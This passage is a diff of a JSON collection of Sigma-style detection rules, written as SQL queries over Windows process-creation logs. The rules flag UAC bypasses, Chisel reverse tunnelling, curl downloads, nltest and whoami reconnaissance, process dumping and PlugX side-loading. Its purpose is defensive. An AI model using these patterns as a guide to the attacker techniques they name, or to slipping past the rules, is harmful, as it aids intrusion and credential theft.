CommandLine LIKE '%pwsh.exe%' ESCAPE '\\' AND CommandLine LIKE '%.bat.exe%' ESCAPE '\\') OR (NewProcessName LIKE '%\\\\attrib.exe' ESCAPE '\\' AND CommandLine LIKE '%+s%' ESCAPE '\\' AND CommandLine LIKE '%+h%' ESCAPE '\\' AND CommandLine LIKE '%.bat.exe%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\regini.exe' ESCAPE '\\' OR OriginalFileName = 'REGINI.EXE') AND NOT (CommandLine REGEXP ':[^ \\\\]'))" ], - "filename": "proc_creation_win_hktl_jlaive_batch_execution.yml" + "filename": "proc_creation_win_regini_execution.yml" }, { - "title": "Deny Service Access Using Security Descriptor Tampering Via Sc.EXE", - "id": "99cf1e02-00fb-4c0d-8375-563f978dfd37", + "title": "UAC Bypass WSReset", + "id": "89a9a0e0-f61a-42e5-8957-b1479565a658", "status": "test", - "description": "Detects suspicious DACL modifications to deny access to a service that affects critical trustees. This can be used to hide services or make them unstoppable.", - "author": "Jonhnathan Ribeiro, oscd.community", + "description": "Detects the pattern of UAC Bypass via WSReset usable by default sysmon-config", + "author": "Christian Burkard (Nextron Systems)", "tags": [ - "attack.persistence", - "attack.t1543.003" + "attack.defense_evasion", + "attack.privilege_escalation", + "attack.t1548.002" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\sc.exe' ESCAPE '\\' OR OriginalFileName = 'sc.exe') AND (CommandLine LIKE '%sdset%' ESCAPE '\\' AND CommandLine LIKE '%D;%' ESCAPE '\\') AND (CommandLine LIKE '%;IU%' ESCAPE '\\' OR CommandLine LIKE '%;SU%' ESCAPE '\\' OR CommandLine LIKE '%;BA%' ESCAPE '\\' OR CommandLine LIKE '%;SY%' ESCAPE '\\' OR CommandLine LIKE '%;WD%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND NewProcessName LIKE '%\\\\wsreset.exe' ESCAPE '\\' AND IntegrityLevel IN ('High', 'System'))" ], - "filename": "proc_creation_win_sc_sdset_deny_service_access.yml" + "filename": "proc_creation_win_uac_bypass_wsreset_integrity_level.yml" }, { - "title": "Network Reconnaissance Activity", - "id": "e6313acd-208c-44fc-a0ff-db85d572e90e", - "status": "test", - "description": "Detects a set of suspicious network related commands often used in recon stages", + "title": "PUA - Process Hacker / System Informer Execution", + "id": "811e0002-b13b-4a15-9d00-a613fce66e42", + "status": "experimental", + "description": "Detects suspicious use of Process Hacker and its newer version named System Informer, a tool to view and manipulate processes, kernel options and other low level stuff", "author": "Florian Roth (Nextron Systems)", - "tags": [ - "attack.discovery", - "attack.t1087", - "attack.t1082", - "car.2016-03-001" - ], "falsepositives": [ - "False positives depend on scripts and administrative tools used in the monitored environment" + "Sometimes used by developers or system administrators for debugging purposes" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '%nslookup%' ESCAPE '\\' AND CommandLine LIKE '%\\_ldap.\\_tcp.dc.\\_msdcs.%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\ProcessHacker\\_%' ESCAPE '\\' OR (NewProcessName LIKE '%\\\\SystemInformer.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\ProcessHacker.exe' ESCAPE '\\') OR OriginalFileName IN ('ProcessHacker.exe', 'Process Hacker', 'SystemInformer.exe') OR Description IN ('Process Hacker', 'System Informer') OR Product = 'Process Hacker' OR (Hashes LIKE '%MD5=68F9B52895F4D34E74112F3129B3B00D%' ESCAPE '\\' OR Hashes LIKE '%SHA1=C5E2018BF7C0F314FED4FD7FE7E69FA2E648359E%' ESCAPE '\\' OR Hashes LIKE '%SHA256=D4A0FE56316A2C45B9BA9AC1005363309A3EDC7ACF9E4DF64D326A0FF273E80F%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=04DE0AD9C37EB7BD52043D2ECAC958DF%' ESCAPE '\\' OR Hashes LIKE '%MD5=B365AF317AE730A67C936F21432B9C71%' ESCAPE '\\' OR Hashes LIKE '%SHA1=A0BDFAC3CE1880B32FF9B696458327CE352E3B1D%' ESCAPE '\\' OR Hashes LIKE '%SHA256=BD2C2CF0631D881ED382817AFCCE2B093F4E412FFB170A719E2762F250ABFEA4%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=3695333C60DEDECDCAFF1590409AA462%' ESCAPE '\\') OR md5 IN ('68f9b52895f4d34e74112f3129b3b00d', 'b365af317ae730a67c936f21432b9c71') OR sha1 IN ('c5e2018bf7c0f314fed4fd7fe7e69fa2e648359e', 'a0bdfac3ce1880b32ff9b696458327ce352e3b1d') OR sha256 IN ('d4a0fe56316a2c45b9ba9ac1005363309a3edc7acf9e4df64d326a0ff273e80f', 'bd2c2cf0631d881ed382817afcce2b093f4e412ffb170a719e2762f250abfea4') OR Imphash IN ('04de0ad9c37eb7bd52043d2ecac958df', '3695333c60dedecdcaff1590409aa462')))" ], - "filename": "proc_creation_win_nslookup_domain_discovery.yml" + "filename": "proc_creation_win_pua_process_hacker.yml" }, { - "title": "Suspicious Whoami.EXE Execution", - "id": "c30fb093-1109-4dc8-88a8-b30d11c95a5d", - "status": "experimental", - "description": "Detects the execution of \"whoami.exe\" with the \"/all\" flag or with redirection options to export the results to a file for later use.", - "author": "Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)", + "title": "Unusually Long PowerShell CommandLine", + "id": "d0d28567-4b9a-45e2-8bbc-fb1b66a1f7f6", + "status": "test", + "description": "Detects unusually long PowerShell command lines with a length of 1000 characters or more", + "author": "oscd.community, Natalia Shornikova", "tags": [ - "attack.discovery", - "attack.t1033", - "car.2016-03-001" + "attack.execution", + "attack.t1059.001" ], "falsepositives": [ "Unknown" ], - "level": "high", + "level": "low", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (((NewProcessName LIKE '%\\\\whoami.exe' ESCAPE '\\' OR OriginalFileName = 'whoami.exe') AND (CommandLine LIKE '% -all%' ESCAPE '\\' OR CommandLine LIKE '% /all%' ESCAPE '\\' OR CommandLine LIKE '% /FO CSV%' ESCAPE '\\' OR CommandLine LIKE '% -FO CSV%' ESCAPE '\\')) OR (CommandLine LIKE '%whoami%' ESCAPE '\\' AND CommandLine LIKE '%>%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\') OR OriginalFileName IN ('PowerShell.EXE', 'pwsh.dll') OR Description = 'Windows Powershell' OR Product = 'PowerShell Core 6') AND CommandLine REGEXP '.{1000,}')" ], - "filename": "proc_creation_win_whoami_susp_flags.yml" + "filename": "proc_creation_win_powershell_abnormal_commandline_size.yml" }, { - "title": "Dumping Process via Sqldumper.exe", - "id": "23ceaf5c-b6f1-4a32-8559-f2ff734be516", - "status": "test", - "description": "Detects process dump via legitimate sqldumper.exe binary", - "author": "Kirill Kiryanov, oscd.community", + "title": "Suspicious Electron Application Child Processes", + "id": "f26eb764-fd89-464b-85e2-dc4a8e6e77b8", + "status": "experimental", + "description": "Detects suspicious child processes of electron apps (teams, discord, slack...).\nThis could be a potential sign of \".asar\" file tampering (See reference section for more information)\n", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.credential_access", - "attack.t1003.001" + "attack.execution" ], "falsepositives": [ - "Legitimate MSSQL Server actions" + "Unknown" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND NewProcessName LIKE '%\\\\sqldumper.exe' ESCAPE '\\' AND (CommandLine LIKE '%0x0110%' ESCAPE '\\' OR CommandLine LIKE '%0x01100:40%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((ParentProcessName LIKE '%\\\\Teams.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\slack.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\discord.exe' ESCAPE '\\') AND (NewProcessName LIKE '%\\\\cmd.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\cscript.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wscript.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\mshta.exe' ESCAPE '\\')) AND NOT (ParentProcessName LIKE '%\\\\Discord.exe' ESCAPE '\\' AND CommandLine LIKE '%\\\\NVSMI\\\\nvidia-smi.exe%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_lolbin_susp_sqldumper_activity.yml" + "filename": "proc_creation_win_susp_electron_app_children.yml" }, { - "title": "PUA - Chisel Tunneling Tool Execution", - "id": "8b0e12da-d3c3-49db-bb4f-256703f380e5", + "title": "Windows Internet Hosted WebDav Share Mount Via Net.EXE", + "id": "7e6237fe-3ddb-438f-9381-9bf9de5af8d0", "status": "experimental", - "description": "Detects usage of the Chisel tunneling tool via the commandline arguments", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects when an internet hosted webdav share is mounted using the \"net.exe\" utility", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.command_and_control", - "attack.t1090.001" + "attack.lateral_movement", + "attack.t1021.002" ], "falsepositives": [ - "Some false positives may occur with other tools with similar commandlines" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\chisel.exe' ESCAPE '\\' OR ((CommandLine LIKE '%exe client %' ESCAPE '\\' OR CommandLine LIKE '%exe server %' ESCAPE '\\') AND (CommandLine LIKE '%-socks5%' ESCAPE '\\' OR CommandLine LIKE '%-reverse%' ESCAPE '\\' OR CommandLine LIKE '% r:%' ESCAPE '\\' OR CommandLine LIKE '%:127.0.0.1:%' ESCAPE '\\' OR CommandLine LIKE '%-tls-skip-verify %' ESCAPE '\\' OR CommandLine LIKE '%:socks%' ESCAPE '\\'))))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\net.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\net1.exe' ESCAPE '\\') OR OriginalFileName IN ('net.exe', 'net1.exe')) AND (CommandLine LIKE '% use %' ESCAPE '\\' OR CommandLine LIKE '% http%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_pua_chisel.yml" + "filename": "proc_creation_win_net_use_mount_internet_share.yml" }, { - "title": "Suspicious Msiexec Execute Arbitrary DLL", - "id": "6f4191bb-912b-48a8-9ce7-682769541e6d", + "title": "Suspicious Schtasks Schedule Types", + "id": "24c8392b-aa3c-46b7-a545-43f71657fe98", "status": "experimental", - "description": "Adversaries may abuse msiexec.exe to proxy execution of malicious payloads.\nMsiexec.exe is the command-line utility for the Windows Installer and is thus commonly associated with executing installation packages (.msi)\n", - "author": "frack113", + "description": "Detects scheduled task creations or modification on a suspicious schedule type", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1218.007" + "attack.execution", + "attack.t1053.005" ], "falsepositives": [ - "Legitimate script" + "Legitimate processes that run at logon. Filter according to your environment" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\msiexec.exe' ESCAPE '\\' AND (CommandLine LIKE '% /y%' ESCAPE '\\' OR CommandLine LIKE '% -y%' ESCAPE '\\')) AND NOT (((CommandLine LIKE '%\\\\MsiExec.exe\" /Y \"C:\\\\Program Files\\\\Bonjour\\\\mdnsNSP.dll%' ESCAPE '\\' OR CommandLine LIKE '%\\\\MsiExec.exe\" /Y \"C:\\\\Program Files (x86)\\\\Bonjour\\\\mdnsNSP.dll%' ESCAPE '\\' OR CommandLine LIKE '%\\\\MsiExec.exe\" /Y \"C:\\\\Program Files (x86)\\\\Apple Software Update\\\\ScriptingObjectModel.dll%' ESCAPE '\\' OR CommandLine LIKE '%\\\\MsiExec.exe\" /Y \"C:\\\\Program Files (x86)\\\\Apple Software Update\\\\SoftwareUpdateAdmin.dll%' ESCAPE '\\' OR CommandLine LIKE '%\\\\MsiExec.exe\" /Y \"C:\\\\Windows\\\\CCM\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\MsiExec.exe\" /Y C:\\\\Windows\\\\CCM\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\MsiExec.exe\" -Y \"C:\\\\Program Files\\\\Bonjour\\\\mdnsNSP.dll%' ESCAPE '\\' OR CommandLine LIKE '%\\\\MsiExec.exe\" -Y \"C:\\\\Program Files (x86)\\\\Bonjour\\\\mdnsNSP.dll%' ESCAPE '\\' OR CommandLine LIKE '%\\\\MsiExec.exe\" -Y \"C:\\\\Program Files (x86)\\\\Apple Software Update\\\\ScriptingObjectModel.dll%' ESCAPE '\\' OR CommandLine LIKE '%\\\\MsiExec.exe\" -Y \"C:\\\\Program Files (x86)\\\\Apple Software Update\\\\SoftwareUpdateAdmin.dll%' ESCAPE '\\' OR CommandLine LIKE '%\\\\MsiExec.exe\" -Y \"C:\\\\Windows\\\\CCM\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\MsiExec.exe\" -Y C:\\\\Windows\\\\CCM\\\\%' ESCAPE '\\'))))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\schtasks.exe' ESCAPE '\\' OR OriginalFileName = 'schtasks.exe') AND (CommandLine LIKE '% ONLOGON %' ESCAPE '\\' OR CommandLine LIKE '% ONSTART %' ESCAPE '\\' OR CommandLine LIKE '% ONCE %' ESCAPE '\\' OR CommandLine LIKE '% ONIDLE %' ESCAPE '\\')) AND NOT (((CommandLine LIKE '%NT AUT%' ESCAPE '\\' OR CommandLine LIKE '% SYSTEM%' ESCAPE '\\' OR CommandLine LIKE '%HIGHEST%' ESCAPE '\\'))))" ], - "filename": "proc_creation_win_msiexec_execute_dll.yml" + "filename": "proc_creation_win_schtasks_schedule_type.yml" }, { - "title": "File Download Via Curl.EXE", - "id": "9a517fca-4ba3-4629-9278-a68694697b81", + "title": "Suspicious Manipulation Of Default Accounts Via Net.EXE", + "id": "5b768e71-86f2-4879-b448-81061cbae951", "status": "experimental", - "description": "Detects file download using curl.exe", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects suspicious manipulations of default accounts such as 'administrator' and 'guest'. For example 'enable' or 'disable' accounts or change the password...etc", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.command_and_control", - "attack.t1105" + "attack.collection", + "attack.t1560.001" ], "falsepositives": [ - "Scripts created by developers and admins", - "Administrative activity", - "The \"\\Git\\usr\\bin\\sh.exe\" process uses the \"--output\" flag to download a specific file in the temp directory with the pattern \"gfw-httpget-xxxxxxxx.txt \"" + "Some false positives could occur with the admin or guest account. It depends on the scripts being used by the admins in your env. If you experience a lot of FP you could reduce the level to medium" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\curl.exe' ESCAPE '\\' OR Product = 'The curl executable') AND (CommandLine LIKE '% -O%' ESCAPE '\\' OR CommandLine LIKE '%--remote-name%' ESCAPE '\\' OR CommandLine LIKE '%--output%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (((NewProcessName LIKE '%\\\\net.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\net1.exe' ESCAPE '\\') OR OriginalFileName IN ('net.exe', 'net1.exe')) AND CommandLine LIKE '% user %' ESCAPE '\\' AND (CommandLine LIKE '% Järjestelmänvalvoja %' ESCAPE '\\' OR CommandLine LIKE '% Rendszergazda %' ESCAPE '\\' OR CommandLine LIKE '% Администратор %' ESCAPE '\\' OR CommandLine LIKE '% Administrateur %' ESCAPE '\\' OR CommandLine LIKE '% Administrador %' ESCAPE '\\' OR CommandLine LIKE '% Administratör %' ESCAPE '\\' OR CommandLine LIKE '% Administrator %' ESCAPE '\\' OR CommandLine LIKE '% guest %' ESCAPE '\\' OR CommandLine LIKE '% DefaultAccount %' ESCAPE '\\' OR CommandLine LIKE '% \"Järjestelmänvalvoja\" %' ESCAPE '\\' OR CommandLine LIKE '% \"Rendszergazda\" %' ESCAPE '\\' OR CommandLine LIKE '% \"Администратор\" %' ESCAPE '\\' OR CommandLine LIKE '% \"Administrateur\" %' ESCAPE '\\' OR CommandLine LIKE '% \"Administrador\" %' ESCAPE '\\' OR CommandLine LIKE '% \"Administratör\" %' ESCAPE '\\' OR CommandLine LIKE '% \"Administrator\" %' ESCAPE '\\' OR CommandLine LIKE '% \"guest\" %' ESCAPE '\\' OR CommandLine LIKE '% \"DefaultAccount\" %' ESCAPE '\\' OR CommandLine LIKE '% ''Järjestelmänvalvoja'' %' ESCAPE '\\' OR CommandLine LIKE '% ''Rendszergazda'' %' ESCAPE '\\' OR CommandLine LIKE '% ''Администратор'' %' ESCAPE '\\' OR CommandLine LIKE '% ''Administrateur'' %' ESCAPE '\\' OR CommandLine LIKE '% ''Administrador'' %' ESCAPE '\\' OR CommandLine LIKE '% ''Administratör'' %' ESCAPE '\\' OR CommandLine LIKE '% ''Administrator'' %' ESCAPE '\\' OR CommandLine LIKE '% ''guest'' %' ESCAPE '\\' OR CommandLine LIKE '% ''DefaultAccount'' %' ESCAPE '\\')) AND NOT (CommandLine LIKE '%guest%' ESCAPE '\\' AND CommandLine LIKE '%/active no%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_curl_download.yml" + "filename": "proc_creation_win_net_default_accounts_manipulation.yml" }, { - "title": "Use of VSIISExeLauncher.exe", - "id": "18749301-f1c5-4efc-a4c3-276ff1f5b6f8", + "title": "Potential Recon Activity Via Nltest.EXE", + "id": "5cc90652-4cbd-4241-aa3b-4b462fa5a248", "status": "experimental", - "description": "The \"VSIISExeLauncher.exe\" binary part of the Visual Studio/VS Code can be used to execute arbitrary binaries", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects nltest commands that can be used for information discovery", + "author": "Craig Young, oscd.community, Georg Lauenstein", "tags": [ - "attack.defense_evasion", - "attack.t1127" + "attack.discovery", + "attack.t1016", + "attack.t1482" ], "falsepositives": [ - "Unknown" + "Legitimate administration use but user and host must be investigated" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\VSIISExeLauncher.exe' ESCAPE '\\' OR OriginalFileName = 'VSIISExeLauncher.exe') AND (CommandLine LIKE '% -p %' ESCAPE '\\' OR CommandLine LIKE '% -a %' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\nltest.exe' ESCAPE '\\' OR OriginalFileName = 'nltestrk.exe') AND ((CommandLine LIKE '%/server%' ESCAPE '\\' AND CommandLine LIKE '%/query%' ESCAPE '\\') OR (CommandLine LIKE '%/dclist:%' ESCAPE '\\' OR CommandLine LIKE '%/parentdomain%' ESCAPE '\\' OR CommandLine LIKE '%/domain\\_trusts%' ESCAPE '\\' OR CommandLine LIKE '%/all\\_trusts%' ESCAPE '\\' OR CommandLine LIKE '%/trusted\\_domains%' ESCAPE '\\' OR CommandLine LIKE '%/user%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_lolbin_vsiisexelauncher.yml" + "filename": "proc_creation_win_nltest_recon.yml" }, { - "title": "ConvertTo-SecureString Cmdlet Usage Via CommandLine", - "id": "74403157-20f5-415d-89a7-c505779585cf", + "title": "UAC Bypass Using ChangePK and SLUI", + "id": "503d581c-7df0-4bbe-b9be-5840c0ecc1fc", "status": "test", - "description": "Detects usage of the \"ConvertTo-SecureString\" cmdlet via the commandline. Which is fairly uncommon and could indicate potential suspicious activity", - "author": "Teymur Kheirkhabarov (idea), Vasiliy Burov (rule), oscd.community, Tim Shelton", + "description": "Detects an UAC bypass that uses changepk.exe and slui.exe (UACMe 61)", + "author": "Christian Burkard (Nextron Systems)", "tags": [ "attack.defense_evasion", - "attack.t1027", - "attack.execution", - "attack.t1059.001" + "attack.privilege_escalation", + "attack.t1548.002" ], "falsepositives": [ - "Legitimate use to pass password to different powershell commands" + "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\') OR OriginalFileName IN ('PowerShell.EXE', 'pwsh.dll')) AND CommandLine LIKE '%ConvertTo-SecureString%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND NewProcessName LIKE '%\\\\changepk.exe' ESCAPE '\\' AND ParentProcessName LIKE '%\\\\slui.exe' ESCAPE '\\' AND IntegrityLevel IN ('High', 'System'))" ], - "filename": "proc_creation_win_powershell_cmdline_convertto_securestring.yml" + "filename": "proc_creation_win_uac_bypass_changepk_slui.yml" }, { - "title": "Potential PlugX Activity", - "id": "aeab5ec5-be14-471a-80e8-e344418305c2", - "status": "test", - "description": "Detects the execution of an executable that is typically used by PlugX for DLL side loading starting from an uncommon location", - "author": "Florian Roth (Nextron Systems)", + "title": "Execution from Suspicious Folder", + "id": "3dfd06d2-eaf4-4532-9555-68aca59f57c4", + "status": "experimental", + "description": "Detects a suspicious execution from an uncommon folder", + "author": "Florian Roth (Nextron Systems), Tim Shelton", "tags": [ - "attack.s0013", "attack.defense_evasion", - "attack.t1574.002" + "attack.t1036" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((((((((((((NewProcessName LIKE '%\\\\CamMute.exe' ESCAPE '\\' AND NOT ((NewProcessName LIKE '%\\\\Lenovo\\\\Communication Utility\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Lenovo\\\\Communications Utility\\\\%' ESCAPE '\\'))) OR (NewProcessName LIKE '%\\\\chrome\\_frame\\_helper.exe' ESCAPE '\\' AND NOT (NewProcessName LIKE '%\\\\Google\\\\Chrome\\\\application\\\\%' ESCAPE '\\'))) OR (NewProcessName LIKE '%\\\\dvcemumanager.exe' ESCAPE '\\' AND NOT (NewProcessName LIKE '%\\\\Microsoft Device Emulator\\\\%' ESCAPE '\\'))) OR (NewProcessName LIKE '%\\\\Gadget.exe' ESCAPE '\\' AND NOT (NewProcessName LIKE '%\\\\Windows Media Player\\\\%' ESCAPE '\\'))) OR (NewProcessName LIKE '%\\\\hcc.exe' ESCAPE '\\' AND NOT (NewProcessName LIKE '%\\\\HTML Help Workshop\\\\%' ESCAPE '\\'))) OR (NewProcessName LIKE '%\\\\hkcmd.exe' ESCAPE '\\' AND NOT ((NewProcessName LIKE '%\\\\System32\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\SysNative\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\SysWow64\\\\%' ESCAPE '\\')))) OR (NewProcessName LIKE '%\\\\Mc.exe' ESCAPE '\\' AND NOT ((NewProcessName LIKE '%\\\\Microsoft Visual Studio%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Microsoft SDK%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Windows Kit%' ESCAPE '\\')))) OR (NewProcessName LIKE '%\\\\MsMpEng.exe' ESCAPE '\\' AND NOT ((NewProcessName LIKE '%\\\\Microsoft Security Client\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Windows Defender\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\AntiMalware\\\\%' ESCAPE '\\')))) OR (NewProcessName LIKE '%\\\\msseces.exe' ESCAPE '\\' AND NOT ((NewProcessName LIKE '%\\\\Microsoft Security Center\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Microsoft Security Client\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Microsoft Security Essentials\\\\%' ESCAPE '\\')))) OR (NewProcessName LIKE '%\\\\OInfoP11.exe' ESCAPE '\\' AND NOT (NewProcessName LIKE '%\\\\Common Files\\\\Microsoft Shared\\\\%' ESCAPE '\\'))) OR (NewProcessName LIKE '%\\\\OleView.exe' ESCAPE '\\' AND NOT ((NewProcessName LIKE '%\\\\Microsoft Visual Studio%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Microsoft SDK%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Windows Kit%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Windows Resource Kit\\\\%' ESCAPE '\\')))) OR (NewProcessName LIKE '%\\\\rc.exe' ESCAPE '\\' AND NOT ((NewProcessName LIKE '%\\\\Microsoft Visual Studio%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Microsoft SDK%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Windows Kit%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Windows Resource Kit\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Microsoft.NET\\\\%' ESCAPE '\\')))))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\$Recycle.bin\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\config\\\\systemprofile\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Intel\\\\Logs\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\RSA\\\\MachineKeys\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Users\\\\All Users\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Users\\\\Default\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Users\\\\NetworkService\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Windows\\\\addins\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Windows\\\\debug\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Windows\\\\Fonts\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Windows\\\\Help\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Windows\\\\IME\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Windows\\\\Media\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Windows\\\\repair\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Windows\\\\security\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Windows\\\\System32\\\\Tasks\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Windows\\\\Tasks\\\\%' ESCAPE '\\') OR NewProcessName LIKE 'C:\\\\Perflogs\\\\%' ESCAPE '\\') AND NOT ((NewProcessName LIKE 'C:\\\\Users\\\\Public\\\\IBM\\\\ClientSolutions\\\\Start\\_Programs\\\\%' ESCAPE '\\') OR (NewProcessName LIKE 'C:\\\\Windows\\\\SysWOW64\\\\config\\\\systemprofile\\\\Citrix\\\\UpdaterBinaries\\\\%' ESCAPE '\\' AND NewProcessName LIKE '%\\\\CitrixReceiverUpdater.exe' ESCAPE '\\')))" ], - "filename": "proc_creation_win_malware_plugx_susp_exe_locations.yml" + "filename": "proc_creation_win_susp_execution_path.yml" }, { - "title": "Tasks Folder Evasion", - "id": "cc4e02ba-9c06-48e2-b09e-2500cace9ae0", - "status": "test", - "description": "The Tasks folder in system32 and syswow64 are globally writable paths.\nAdversaries can take advantage of this and load or influence any script hosts or ANY .NET Application \nin Tasks to load and execute a custom assembly into cscript, wscript, regsvr32, mshta, eventvwr\n", - "author": "Sreeman", + "title": "Suspicious Cabinet File Execution Via Msdt.EXE", + "id": "dc4576d4-7467-424f-9eee-fd2b02855fe0", + "status": "experimental", + "description": "Detects execution of msdt.exe using the \"cab\" flag which could indicates suspicious diagcab files with embedded answer files leveraging CVE-2022-30190", + "author": "Nasreddine Bencherchali (Nextron Systems), GossiTheDog, frack113", "tags": [ "attack.defense_evasion", - "attack.persistence", - "attack.execution", - "attack.t1574.002" + "attack.t1202" ], "falsepositives": [ - "Unknown" + "Legitimate usage of \".diagcab\" files" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND (CommandLine LIKE '%echo %' ESCAPE '\\' OR CommandLine LIKE '%copy %' ESCAPE '\\' OR CommandLine LIKE '%type %' ESCAPE '\\' OR CommandLine LIKE '%file createnew%' ESCAPE '\\') AND (CommandLine LIKE '% C:\\\\Windows\\\\System32\\\\Tasks\\\\%' ESCAPE '\\' OR CommandLine LIKE '% C:\\\\Windows\\\\SysWow64\\\\Tasks\\\\%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\msdt.exe' ESCAPE '\\' OR OriginalFileName = 'msdt.exe') AND (CommandLine LIKE '% /cab %' ESCAPE '\\' OR CommandLine LIKE '% -cab %' ESCAPE '\\'))" ], - "filename": "proc_creation_win_susp_task_folder_evasion.yml" + "filename": "proc_creation_win_msdt_susp_cab_options.yml" }, { - "title": 